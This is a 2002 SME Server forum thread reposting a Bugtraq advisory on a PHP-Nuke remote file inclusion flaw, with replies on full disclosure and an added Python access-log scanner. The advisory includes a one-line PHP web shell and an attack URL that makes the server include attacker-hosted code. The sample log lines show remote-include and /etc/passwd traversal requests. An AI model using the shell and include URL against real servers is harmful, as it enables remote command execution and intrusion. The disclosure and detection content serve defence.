Koozali.org: home of the SME Server

Legacy Forums => Experienced User Forum => Topic started by: guestHH on January 17, 2002, 01:43:59 AM

Title: New possible danger with PHP-Nuke????
Post by: guestHH on January 17, 2002, 01:43:59 AM
Quote"

From Bugtraq, by Handle Nopman [nopman@hackermail.com]

Hi All!

I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.

The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...

How to exploit:
Upload this file to some free web space provider or
setup your own server:
system($cmd);
?>
Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)

Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.

Sincerely
"Nopman"

" unquote

Don't want to scare you in any way, but it sounds interesting enough to investigate, I think. Just to let you know.

HFW
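
For SME Server admins who run PHP-Nuke, one way to check a web server's access log for requests of the kind the advisory describes. This is an added example, not part of the original posts or of PHP-Nuke; the log lines are constructed sample data, and the combined-log layout and the names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data, not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jan/2002:10:00:01 +0000] "GET /index.php?file=article HTTP/1.0" 200 5120
192.0.2.44 - - [17/Jan/2002:10:02:13 +0000] "GET /index.php?file=http://files.example/x.php&cmd=id HTTP/1.0" 200 312
192.0.2.44 - - [17/Jan/2002:10:02:40 +0000] "GET /index.php?file=hTTp%3A%2F%2Ffiles.example%2Fx.php HTTP/1.0" 200 298
192.0.2.51 - - [17/Jan/2002:10:05:09 +0000] "GET /index.php?file=%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 200 5120
192.0.2.60 - - [17/Jan/2002:10:06:30 +0000] "GET /modules.php?name=News&file=article HTTP/1.0" 200 7400
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

def classify(value):
    """Return why an include-parameter value is suspicious, or None."""
    if SCHEME.match(value):
        return "remote-url"        # the case a ".."-only filter lets through
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    if value.startswith("/"):
        return "absolute-path"
    return None

def scan(log_text, script="index.php", param="file"):
    """Return (client, reason, value) for suspicious requests to `script`."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue                # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes once, so encoded "http%3A%2F%2F" is caught too
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                hits.append((client, reason, value))
    return hits

if __name__ == "__main__":
    for client, reason, value in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

The "remote get feature" the advisory refers to is PHP's URL-aware file handling, which the `allow_url_fopen` setting in php.ini turns off.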
Title: Re: New possible danger with PHP-Nuke????
Post by: Alejandro on January 17, 2002, 07:26:29 PM
Do you think this helps any of the SME users?
I feel like someone is telling everybody how my server could be entered.
I think there are a lot of security rules that advise us not to publish this kind of data (especially exploitable data) in an open forum.
Anyway, there is an address for that kind of subject enabled by the support team.
Title: Re: New possible danger with PHP-Nuke????
Post by: Rich Lafferty on January 17, 2002, 07:33:05 PM
While I don't really want to enter into another discussion on the merits and
risks of full disclosure, I *should* point out that PHP-Nuke is entirely
unsupported by Mitel Networks. The proper destination for reports of problems
with PHP-Nuke is the author of PHP-Nuke.

(The original post was a copy of a post sent to the public mailing list,
BUGTRAQ, and not a report of a compromised server. We *do* request
that reports of compromised e-smith and SME Server systems go to
security@e-smith.com before being announced publicly, but that request
doesn't apply in this instance as no specific system was breached.)

Cheers,

-Rich
Title: Re: New possible danger with PHP-Nuke????
Post by: guestHH on January 17, 2002, 10:00:21 PM
Hi Alejandro and Rich,

I agree with Rich on the matter that it is not an e-smith (SME) issue. It is an issue that concerns SME users who use PHP-Nuke. My understanding is that there are quite a number of PHP-Nuke users among the SME users, according to the earlier warning issued by Mitel on their www.e-smith.org website.

Also, as Rich stated, it is a copy of a thread from a public mailing list, so I just 'forwarded' it so that SME + PHP-Nuke users know about it in case they do not follow the PUBLIC bugtraq mailing list.

In any other case (concerning SME server) I would follow the zillion times expressed way to report bugs c.q. security issues directly to MITEL.

Thanks.

guest